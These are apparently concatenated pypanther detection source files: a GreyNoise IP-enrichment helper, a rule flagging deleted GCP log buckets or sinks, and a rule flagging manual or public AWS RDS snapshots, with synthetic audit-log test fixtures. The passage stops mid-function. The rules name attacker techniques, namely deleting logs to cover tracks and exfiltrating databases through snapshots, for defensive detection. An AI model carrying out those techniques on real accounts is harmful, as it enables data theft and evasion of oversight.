"""Used to simplify the use of GreyNoise Data in Rules"""

# pylint: disable=too-many-public-methods
import datetime
from collections.abc import Sequence
from typing import Union

from dateutil import parser

from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.helpers.panther_lookuptable_helpers import LookupTableMatches


class PantherGreyNoiseException(Exception):
    def __init__(self, sublevel):
        if sublevel == "advanced":
            message = (
                "This account is configured with an advanced GreyNoise Subscription. Please "
                "use GreyNoiseAdvanced and GreyNoiseRIOTAdvanced "
            )
        elif sublevel == "basic":
            message = (
                "This account is configured with a basic GreyNoise Subscription. Please use "
                "GreyNoiseBasic and GreyNoiseRIOTBasic "
            )
        else:
            message = "Unknown Error Reading GreyNoise Data"
        super().__init__(message)


class GreyNoiseBasic(LookupTableMatches):
    def __init__(self, event):
        super().__init__()
        super()._register(event, "greynoise_noise_basic")
        self.sublevel = "basic"

    def __getattr__(self, name):
        def advanced_only():
            advanced_methods = [
                method
                for method in dir(GreyNoiseAdvanced)
                if method.startswith("__") is False and method not in dir(self)
            ]
            if name in advanced_methods:
                raise PantherGreyNoiseException(self.sublevel)

        return advanced_only()

    def subscription_level(self):
        return self.sublevel

    def ip_address(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "ip")

    def classification(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "classification")

    def actor(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "actor")

    def url(self, match_field: str) -> Union[list[str], str, None]:
        ip_address = self._lookup(match_field, "ip")
        if not ip_address:
            return None
        if isinstance(ip_address, Sequence) and not isinstance(ip_address, str):
            return [f"https://www.greynoise.io/viz/ip/{list_ip_address}" for list_ip_address in ip_address]
        return f"https://www.greynoise.io/viz/ip/{ip_address}"

    def context(self, match_field: str) -> dict:
        return {
            "IP": self.ip_address(match_field),
            "Classification": self.classification(match_field),
            "Actor": self.actor(match_field),
            "GreyNoise_URL": self.url(match_field),
        }


class GreyNoiseAdvanced(GreyNoiseBasic):
    # pylint: disable=W0231
    def __init__(self, event):
        super().__init__(event)
        super()._register(event, "greynoise_noise_advanced")
        self.sublevel = "advanced"

    def is_bot(self, match_field: str) -> bool:
        return bool(self._lookup(match_field, "bot"))

    def cve_string(self, match_field: str, limit: int = 10) -> str:
        cve_raw = self._lookup(match_field, "cve")
        if isinstance(cve_raw, Sequence) and not isinstance(cve_raw, str):
            return " ".join(cve_raw[:limit])
        return cve_raw

    def cve_list(self, match_field: str) -> list:
        cve_raw = self._lookup(match_field, "cve")
        if isinstance(cve_raw, str):
            return [cve_raw]
        return cve_raw

    def first_seen(self, match_field: str) -> datetime.date:
        time = self._lookup(match_field, "first_seen")
        if not time:
            return None
        if isinstance(time, Sequence) and not isinstance(time, str):
            if len(time) == 0:
                return None
            return min(parser.parse(t) for t in time)
        return parser.parse(time)

    def last_seen(self, match_field: str) -> datetime.date:
        time = self._lookup(match_field, "last_seen_timestamp")
        if not time:
            return None
        if isinstance(time, Sequence) and not isinstance(time, str):
            if len(time) == 0:
                return None
            return max(parser.parse(t) for t in time)
        return parser.parse(time)

    def asn(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "asn")

    def category(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "category")

    def city(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "city")

    def country(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "country")

    def country_code(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "country_code")

    def organization(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "organization")

    def operating_system(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "os")

    def region(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "region")

    def is_tor(self, match_field: str) -> bool:
        return bool(self._lookup(match_field, "metadata", "tor"))

    def rev_dns(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata", "rdns")

    def is_spoofable(self, match_field: str) -> bool:
        return bool(self._lookup(match_field, "spoofable"))

    def tags_list(self, match_field: str) -> list:
        tags = self._lookup(match_field, "tags")
        if isinstance(tags, str):
            return [tags]
        return tags

    def tags_string(self, match_field: str, limit: int = 10) -> str:
        tags_raw = self._lookup(match_field, "tags")
        if isinstance(tags_raw, Sequence) and not isinstance(tags_raw, str):
            return " ".join(tags_raw[:limit])
        return tags_raw

    def is_vpn(self, match_field: str) -> bool:
        return bool(self._lookup(match_field, "vpn"))

    def vpn_service(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "vpn_service")

    def metadata(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "metadata")

    def context(self, match_field: str) -> dict:
        return {
            "IP": self.ip_address(match_field),
            "Classification": self.classification(match_field),
            "Actor": self.actor(match_field),
            "GreyNoise_URL": self.url(match_field),
            "VPN": self.vpn_service(match_field),
            "Metadata": self.metadata(match_field),
            "Tags": self.tags_list(match_field),
            "CVE": self.cve_list(match_field),
        }


class GreyNoiseRIOTBasic(LookupTableMatches):
    def __init__(self, event):
        super().__init__()
        super()._register(event, "greynoise_riot_basic")
        self.sublevel = "basic"

    def __getattr__(self, name):
        def advanced_only():
            advanced_methods = [
                method
                for method in dir(GreyNoiseRIOTAdvanced)
                if method.startswith("__") is False and method not in dir(self)
            ]
            if name in advanced_methods:
                raise PantherGreyNoiseException(self.sublevel)

        return advanced_only()

    def subscription_level(self):
        return self.sublevel

    def is_riot(self, match_field: str) -> bool:
        is_riot = self._lookup(match_field, "ip_cidr")
        if not is_riot:
            return False
        if isinstance(is_riot, Sequence) and not isinstance(is_riot, str):  # at least 1
            for list_is_riot in is_riot:
                if list_is_riot:
                    return True
            return False
        return True

    def ip_address(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "ip_cidr")

    def name(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "provider", "name")

    def url(self, match_field: str) -> Union[list[str], str]:
        ip_stripped = self._lookup(match_field, "ip_cidr")
        if not ip_stripped:
            return None
        if isinstance(ip_stripped, Sequence) and not isinstance(ip_stripped, str):
            return [f"https://www.greynoise.io/viz/ip/{list_ip_stripped}" for list_ip_stripped in ip_stripped]
        return f"https://www.greynoise.io/viz/ip/{ip_stripped.split('/')[0]}"

    def last_updated(self, match_field: str) -> datetime.date:
        time = self._lookup(match_field, "scan_time")
        if not time:
            return None
        if isinstance(time, Sequence) and not isinstance(time, str):
            if len(time) == 0:
                return None
            return max(parser.parse(t) for t in time)
        return parser.parse(time)

    def context(self, match_field: str) -> dict:
        return {
            "Is_RIOT": self.is_riot(match_field),
            "IP": self.ip_address(match_field),
            "Name": self.name(match_field),
            "GreyNoise_URL": self.url(match_field),
        }


class GreyNoiseRIOTAdvanced(GreyNoiseRIOTBasic):
    # pylint: disable=W0231
    def __init__(self, event):
        super()._register(event, "greynoise_riot_advanced")
        self.sublevel = "advanced"

    def description(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "provider", "description")

    def category(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "provider", "category")

    def explanation(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "provider", "explanation")

    def reference(self, match_field: str) -> Union[list[str], str]:
        return self._lookup(match_field, "provider", "reference")

    def trust_level(self, match_field: str) -> Union[int, list[str], str]:
        return self._lookup(match_field, "provider", "trust_level")

    def context(self, match_field: str) -> dict:
        return {
            "Is_RIOT": self.is_riot(match_field),
            "IP": self.ip_address(match_field),
            "Name": self.name(match_field),
            "GreyNoise_URL": self.url(match_field),
            "Provider Data": self._lookup(match_field, "provider"),
        }


# pylint: disable=invalid-name
def GetGreyNoiseObject(event):
    if deep_get(event, "p_enrichment", "greynoise_noise_advanced"):
        return GreyNoiseAdvanced(event)
    return GreyNoiseBasic(event)


def GetGreyNoiseRiotObject(event):
    if deep_get(event, "p_enrichment", "greynoise_riot_advanced"):
        return GreyNoiseRIOTAdvanced(event)
    return GreyNoiseRIOTBasic(event)


def GreyNoiseSeverity(event, field, default="MEDIUM"):
    # Set Severity based on GreyNoise classification.
    # If unknown to GreyNoise return default
    noise = GetGreyNoiseObject(event)
    riot = GetGreyNoiseRiotObject(event)

    # If IP exists in RIOT Dataset it is known good, lower alert severity
    if riot.is_riot(field):
        return "INFO"

    classification = noise.classification(field)
    if isinstance(classification, Sequence) and not isinstance(classification, str):
        highest_severity = "INFO"
        for list_classification in classification:
            severity = GreyNoiseSeverityDecode(list_classification, default)
            if SeverityGreaterThan(severity, highest_severity):
                highest_severity = severity
        return highest_severity

    # If classification is unknown default to medium
    return GreyNoiseSeverityDecode(classification, default)


def GreyNoiseSeverityDecode(classification: str, default: str) -> str:
    if classification == "malicious":
        return "CRITICAL"
    if classification == "benign":
        return "LOW"
    return default


_SEVERITIES = {
    "INFO": 0,
    "LOW": 1,
    "MEDIUM": 2,
    "HIGH": 3,
    "CRITICAL": 4,
}


def SeverityGreaterThan(sev1: str, sev2: str) -> bool:
    return _SEVERITIES.get(sev1) > _SEVERITIES.get(sev2)



import re

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.gcp_base_helpers import gcp_alert_context
from pypanther.helpers.panther_base_helpers import deep_get, deep_walk

gcp_log_bucket_or_sink_deleted_tests: list[RuleTest] = [
    RuleTest(
        name="logging-bucket.deleted-should-alert",
        expected_result=True,
        log={
            "insertid": "xxxxxxxxxx",
            "logname": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@domain.com"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "logging.buckets.delete",
                        "resource": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                        "resourceAttributes": {
                            "name": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                            "service": "logging.googleapis.com",
                        },
                    },
                ],
                "methodName": "google.logging.v2.ConfigServiceV2.DeleteBucket",
                "request": {
                    "@type": "type.googleapis.com/google.logging.v2.DeleteBucketRequest",
                    "name": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:38:36.846070601Z"},
                },
                "resourceName": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                "serviceName": "logging.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:38:37.59",
            "resource": {
                "labels": {
                    "method": "google.logging.v2.ConfigServiceV2.DeleteBucket",
                    "project_id": "test-project-123456",
                    "service": "logging.googleapis.com",
                },
                "type": "audited_resource",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:38:36.838",
        },
    ),
    RuleTest(
        name="logging-sink.deleted-should-alert",
        expected_result=True,
        log={
            "insertid": "xxxxxxxxxx",
            "logname": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@domain.com"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "logging.sinks.delete",
                        "resource": "projects/test-project-123456/sinks/test-1",
                        "resourceAttributes": {
                            "name": "projects/test-project-123456/sinks/test-1",
                            "service": "logging.googleapis.com",
                        },
                    },
                ],
                "methodName": "google.logging.v2.ConfigServiceV2.DeleteSink",
                "request": {
                    "@type": "type.googleapis.com/google.logging.v2.DeleteSinkRequest",
                    "sinkName": "projects/test-project-123456/sinks/test-1",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:39:15.230304077Z"},
                },
                "resourceName": "projects/test-project-123456/sinks/test-1",
                "serviceName": "logging.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:39:15.565",
            "resource": {
                "labels": {"destination": "", "name": "test-1", "project_id": "test-project-123456"},
                "type": "logging_sink",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:39:15.213",
        },
    ),
    RuleTest(
        name="logging-bucket.non-deletion-should-not-alert",
        expected_result=False,
        log={
            "insertid": "xxxxxxxxxx",
            "logname": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@domain.com"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "logging.buckets.get",
                        "resource": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                        "resourceAttributes": {
                            "name": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                            "service": "logging.googleapis.com",
                        },
                    },
                ],
                "methodName": "google.logging.v2.ConfigServiceV2.GetBucket",
                "request": {
                    "@type": "type.googleapis.com/google.logging.v2.GetBucketRequest",
                    "name": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:38:36.846070601Z"},
                },
                "resourceName": "projects/test-project-123456/locations/global/buckets/testloggingbucket",
                "serviceName": "logging.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:38:37.59",
            "resource": {
                "labels": {
                    "method": "google.logging.v2.ConfigServiceV2.GetBucket",
                    "project_id": "test-project-123456",
                    "service": "logging.googleapis.com",
                },
                "type": "audited_resource",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:38:36.838",
        },
    ),
    RuleTest(
        name="logging-sink.non-deletion-should-not-alert",
        expected_result=False,
        log={
            "insertid": "xxxxxxxxxx",
            "logname": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@domain.com"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "logging.sinks.get",
                        "resource": "projects/test-project-123456/sinks/test-1",
                        "resourceAttributes": {
                            "name": "projects/test-project-123456/sinks/test-1",
                            "service": "logging.googleapis.com",
                        },
                    },
                ],
                "methodName": "google.logging.v2.ConfigServiceV2.GetSink",
                "request": {
                    "@type": "type.googleapis.com/google.logging.v2.GetSinkRequest",
                    "sinkName": "projects/test-project-123456/sinks/test-1",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:39:15.230304077Z"},
                },
                "resourceName": "projects/test-project-123456/sinks/test-1",
                "serviceName": "logging.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:39:15.565",
            "resource": {
                "labels": {"destination": "", "name": "test-1", "project_id": "test-project-123456"},
                "type": "logging_sink",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:39:15.213",
        },
    ),
]


@panther_managed
class GCPLogBucketOrSinkDeleted(Rule):
    display_name = "GCP Log Bucket or Sink Deleted"
    id = "GCP.Log.Bucket.Or.Sink.Deleted-prototype"
    default_severity = Severity.MEDIUM
    log_types = [LogType.GCP_AUDIT_LOG]
    tags = ["GCP", "Logging", "Bucket", "Sink", "Infrastructure"]
    default_description = "This rule detects deletions of GCP Log Buckets or Sinks.\n"
    default_runbook = (
        "Ensure that the bucket or sink deletion was expected. Adversaries may do this to cover their tracks.\n"
    )
    default_reference = "https://cloud.google.com/logging/docs"
    tests = gcp_log_bucket_or_sink_deleted_tests

    def rule(self, event):
        authenticated = deep_walk(event, "protoPayload", "authorizationInfo", "granted", default=False)
        method_pattern = "(?:\\w+\\.)*v\\d\\.(?:ConfigServiceV\\d\\.(?:Delete(Bucket|Sink)))"
        match = re.search(method_pattern, deep_get(event, "protoPayload", "methodName", default=""))
        return authenticated and match is not None

    def title(self, event):
        actor = deep_get(event, "protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")
        resource = deep_get(event, "protoPayload", "resourceName", default="<RESOURCE_NOT_FOUND>")
        return f"[GCP]: [{actor}] deleted logging bucket or sink [{resource}]"

    def alert_context(self, event):
        return gcp_alert_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import aws_rule_context

awsrds_manual_snapshot_created_tests: list[RuleTest] = [
    RuleTest(
        name="Manual Snapshot Created",
        expected_result=True,
        log={
            "eventVersion": "1.08",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "AROA2DFDF0C1FDFCAD2B2:fake.user",
                "arn": "arn:aws:sts::123456789012:assumed-role/ARole/fake.user",
                "accountId": "123456789012",
                "accessKeyId": "ASIAFFA5AFEC02FFCD8ED",
                "sessionContext": {
                    "sessionIssuer": {
                        "type": "Role",
                        "principalId": "AROA2DFDF0C1FDFCAD2B2",
                        "arn": "arn:aws:iam::123456789012:role/aws-reserved/sso.amazonaws.com/us-west-2/ARole",
                        "accountId": "123456789012",
                        "userName": "ARole",
                    },
                    "webIdFederationData": {},
                    "attributes": {"creationDate": "2023-12-08T13:53:48Z", "mfaAuthenticated": "false"},
                },
            },
            "eventTime": "2023-12-08T14:55:19Z",
            "eventSource": "rds.amazonaws.com",
            "eventName": "CreateDBSnapshot",
            "awsRegion": "us-west-2",
            "sourceIPAddress": "1.2.3.4",
            "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io) terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws) aws-sdk-go/1.44.157 (go1.19.3; darwin; arm64) 68319f60-9dec-43b2-9702-de3a08c9d8a3 HashiCorp-terraform-exec/0.17.3",
            "requestParameters": {
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "dBSnapshotIdentifier": "exfiltration",
            },
            "responseElements": {
                "allocatedStorage": 10,
                "instanceCreateTime": "Dec 8, 2023 2:55:17 PM",
                "dBSnapshotIdentifier": "exfiltration",
                "dbiResourceId": "db-TYZSSMTWIABIR6QKKFGI55XKJQ",
                "port": 3306,
                "availabilityZone": "us-west-2b",
                "dBSnapshotArn": "arn:aws:rds:us-west-2:123456789012:snapshot:exfiltration",
                "processorFeatures": [],
                "encrypted": False,
                "percentProgress": 0,
                "optionGroupName": "default:mysql-8-0",
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "storageType": "gp2",
                "iAMDatabaseAuthenticationEnabled": False,
                "vpcId": "vpc-0c9c141888d129377",
                "storageThroughput": 0,
                "dedicatedLogVolume": False,
                "status": "creating",
                "masterUsername": "admin",
                "engine": "mysql",
                "snapshotType": "manual",
                "engineVersion": "8.0.33",
                "licenseModel": "general-public-license",
                "snapshotTarget": "region",
            },
            "requestID": "e5fd8d41-db7c-45df-a21a-f9cff8c19755",
            "eventID": "c665b42c-89b4-4072-ad71-0f9c8d50f649",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "managementEvent": True,
            "recipientAccountId": "123456789012",
            "eventCategory": "Management",
            "tlsDetails": {
                "tlsVersion": "TLSv1.3",
                "cipherSuite": "TLS_AES_128_GCM_SHA256",
                "clientProvidedHostHeader": "rds.us-west-2.amazonaws.com",
            },
        },
    ),
    RuleTest(
        name="Public Snapshot Created",
        expected_result=True,
        log={
            "eventVersion": "1.08",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "AROA2DFDF0C1FDFCAD2B2:fake.user",
                "arn": "arn:aws:sts::123456789012:assumed-role/ARole/fake.user",
                "accountId": "123456789012",
                "accessKeyId": "ASIAFFA5AFEC02FFCD8ED",
                "sessionContext": {
                    "sessionIssuer": {
                        "type": "Role",
                        "principalId": "AROA2DFDF0C1FDFCAD2B2",
                        "arn": "arn:aws:iam::123456789012:role/aws-reserved/sso.amazonaws.com/us-west-2/ARole",
                        "accountId": "123456789012",
                        "userName": "ARole",
                    },
                    "webIdFederationData": {},
                    "attributes": {"creationDate": "2023-12-08T13:53:48Z", "mfaAuthenticated": "false"},
                },
            },
            "eventTime": "2023-12-08T14:55:19Z",
            "eventSource": "rds.amazonaws.com",
            "eventName": "CreateDBSnapshot",
            "awsRegion": "us-west-2",
            "sourceIPAddress": "1.2.3.4",
            "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io) terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws) aws-sdk-go/1.44.157 (go1.19.3; darwin; arm64) 68319f60-9dec-43b2-9702-de3a08c9d8a3 HashiCorp-terraform-exec/0.17.3",
            "requestParameters": {
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "dBSnapshotIdentifier": "exfiltration",
            },
            "responseElements": {
                "allocatedStorage": 10,
                "instanceCreateTime": "Dec 8, 2023 2:55:17 PM",
                "dBSnapshotIdentifier": "exfiltration",
                "dbiResourceId": "db-TYZSSMTWIABIR6QKKFGI55XKJQ",
                "port": 3306,
                "availabilityZone": "us-west-2b",
                "dBSnapshotArn": "arn:aws:rds:us-west-2:123456789012:snapshot:exfiltration",
                "processorFeatures": [],
                "encrypted": False,
                "percentProgress": 0,
                "optionGroupName": "default:mysql-8-0",
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "storageType": "gp2",
                "iAMDatabaseAuthenticationEnabled": False,
                "vpcId": "vpc-0c9c141888d129377",
                "storageThroughput": 0,
                "dedicatedLogVolume": False,
                "status": "creating",
                "masterUsername": "admin",
                "engine": "mysql",
                "snapshotType": "public",
                "engineVersion": "8.0.33",
                "licenseModel": "general-public-license",
                "snapshotTarget": "region",
            },
            "requestID": "e5fd8d41-db7c-45df-a21a-f9cff8c19755",
            "eventID": "c665b42c-89b4-4072-ad71-0f9c8d50f649",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "managementEvent": True,
            "recipientAccountId": "123456789012",
            "eventCategory": "Management",
            "tlsDetails": {
                "tlsVersion": "TLSv1.3",
                "cipherSuite": "TLS_AES_128_GCM_SHA256",
                "clientProvidedHostHeader": "rds.us-west-2.amazonaws.com",
            },
        },
    ),
    RuleTest(
        name="Automated Snapshot Created",
        expected_result=False,
        log={
            "eventVersion": "1.08",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "AROA2DFDF0C1FDFCAD2B2:fake.user",
                "arn": "arn:aws:sts::123456789012:assumed-role/ARole/fake.user",
                "accountId": "123456789012",
                "accessKeyId": "ASIAFFA5AFEC02FFCD8ED",
                "sessionContext": {
                    "sessionIssuer": {
                        "type": "Role",
                        "principalId": "AROA2DFDF0C1FDFCAD2B2",
                        "arn": "arn:aws:iam::123456789012:role/aws-reserved/sso.amazonaws.com/us-west-2/ARole",
                        "accountId": "123456789012",
                        "userName": "ARole",
                    },
                    "webIdFederationData": {},
                    "attributes": {"creationDate": "2023-12-08T13:53:48Z", "mfaAuthenticated": "false"},
                },
            },
            "eventTime": "2023-12-08T14:55:19Z",
            "eventSource": "rds.amazonaws.com",
            "eventName": "CreateDBSnapshot",
            "awsRegion": "us-west-2",
            "sourceIPAddress": "1.2.3.4",
            "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io) terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws) aws-sdk-go/1.44.157 (go1.19.3; darwin; arm64) 68319f60-9dec-43b2-9702-de3a08c9d8a3 HashiCorp-terraform-exec/0.17.3",
            "requestParameters": {
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "dBSnapshotIdentifier": "exfiltration",
            },
            "responseElements": {
                "allocatedStorage": 10,
                "instanceCreateTime": "Dec 8, 2023 2:55:17 PM",
                "dBSnapshotIdentifier": "exfiltration",
                "dbiResourceId": "db-TYZSSMTWIABIR6QKKFGI55XKJQ",
                "port": 3306,
                "availabilityZone": "us-west-2b",
                "dBSnapshotArn": "arn:aws:rds:us-west-2:123456789012:snapshot:exfiltration",
                "processorFeatures": [],
                "encrypted": False,
                "percentProgress": 0,
                "optionGroupName": "default:mysql-8-0",
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "storageType": "gp2",
                "iAMDatabaseAuthenticationEnabled": False,
                "vpcId": "vpc-0c9c141888d129377",
                "storageThroughput": 0,
                "dedicatedLogVolume": False,
                "status": "creating",
                "masterUsername": "admin",
                "engine": "mysql",
                "snapshotType": "automated",
                "engineVersion": "8.0.33",
                "licenseModel": "general-public-license",
                "snapshotTarget": "region",
            },
            "requestID": "e5fd8d41-db7c-45df-a21a-f9cff8c19755",
            "eventID": "c665b42c-89b4-4072-ad71-0f9c8d50f649",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "managementEvent": True,
            "recipientAccountId": "123456789012",
            "eventCategory": "Management",
            "tlsDetails": {
                "tlsVersion": "TLSv1.3",
                "cipherSuite": "TLS_AES_128_GCM_SHA256",
                "clientProvidedHostHeader": "rds.us-west-2.amazonaws.com",
            },
        },
    ),
    RuleTest(
        name="Awsbackup Snapshot Created",
        expected_result=False,
        log={
            "eventVersion": "1.08",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "AROA2DFDF0C1FDFCAD2B2:fake.user",
                "arn": "arn:aws:sts::123456789012:assumed-role/ARole/fake.user",
                "accountId": "123456789012",
                "accessKeyId": "ASIAFFA5AFEC02FFCD8ED",
                "sessionContext": {
                    "sessionIssuer": {
                        "type": "Role",
                        "principalId": "AROA2DFDF0C1FDFCAD2B2",
                        "arn": "arn:aws:iam::123456789012:role/aws-reserved/sso.amazonaws.com/us-west-2/ARole",
                        "accountId": "123456789012",
                        "userName": "ARole",
                    },
                    "webIdFederationData": {},
                    "attributes": {"creationDate": "2023-12-08T13:53:48Z", "mfaAuthenticated": "false"},
                },
            },
            "eventTime": "2023-12-08T14:55:19Z",
            "eventSource": "rds.amazonaws.com",
            "eventName": "CreateDBSnapshot",
            "awsRegion": "us-west-2",
            "sourceIPAddress": "1.2.3.4",
            "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io) terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws) aws-sdk-go/1.44.157 (go1.19.3; darwin; arm64) 68319f60-9dec-43b2-9702-de3a08c9d8a3 HashiCorp-terraform-exec/0.17.3",
            "requestParameters": {
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "dBSnapshotIdentifier": "exfiltration",
            },
            "responseElements": {
                "allocatedStorage": 10,
                "instanceCreateTime": "Dec 8, 2023 2:55:17 PM",
                "dBSnapshotIdentifier": "exfiltration",
                "dbiResourceId": "db-TYZSSMTWIABIR6QKKFGI55XKJQ",
                "port": 3306,
                "availabilityZone": "us-west-2b",
                "dBSnapshotArn": "arn:aws:rds:us-west-2:123456789012:snapshot:exfiltration",
                "processorFeatures": [],
                "encrypted": False,
                "percentProgress": 0,
                "optionGroupName": "default:mysql-8-0",
                "dBInstanceIdentifier": "terraform-20231208145149286600000001",
                "storageType": "gp2",
                "iAMDatabaseAuthenticationEnabled": False,
                "vpcId": "vpc-0c9c141888d129377",
                "storageThroughput": 0,
                "dedicatedLogVolume": False,
                "status": "creating",
                "masterUsername": "admin",
                "engine": "mysql",
                "snapshotType": "awsbackup",
                "engineVersion": "8.0.33",
                "licenseModel": "general-public-license",
                "snapshotTarget": "region",
            },
            "requestID": "e5fd8d41-db7c-45df-a21a-f9cff8c19755",
            "eventID": "c665b42c-89b4-4072-ad71-0f9c8d50f649",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "managementEvent": True,
            "recipientAccountId": "123456789012",
            "eventCategory": "Management",
            "tlsDetails": {
                "tlsVersion": "TLSv1.3",
                "cipherSuite": "TLS_AES_128_GCM_SHA256",
                "clientProvidedHostHeader": "rds.us-west-2.amazonaws.com",
            },
        },
    ),
]


@panther_managed
class AWSRDSManualSnapshotCreated(Rule):
    id = "AWS.RDS.ManualSnapshotCreated-prototype"
    display_name = "AWS RDS Manual/Public Snapshot Created"
    log_types = [LogType.AWS_CLOUDTRAIL]
    tags = ["AWS", "Exfiltration", "Transfer Data to Cloud Account"]
    reports = {"MITRE ATT&CK": ["TA0010:T1537"]}
    default_severity = Severity.LOW
    default_description = "A manual snapshot of an RDS database was created. An attacker may use this to exfiltrate the DB contents to another account; use this as a correlation rule.\n"
    default_runbook = "Ensure the snapshot was shared with an allowed AWS account. If not, delete the snapshot and quarantine the compromised IAM user.\n"
    default_reference = "https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_CreateSnapshot.html"
    summary_attributes = ["eventSource", "recipientAccountId", "awsRegion", "p_any_aws_arns"]
    tests = awsrds_manual_snapshot_created_tests

    def rule(self, event):
        return all(
            [
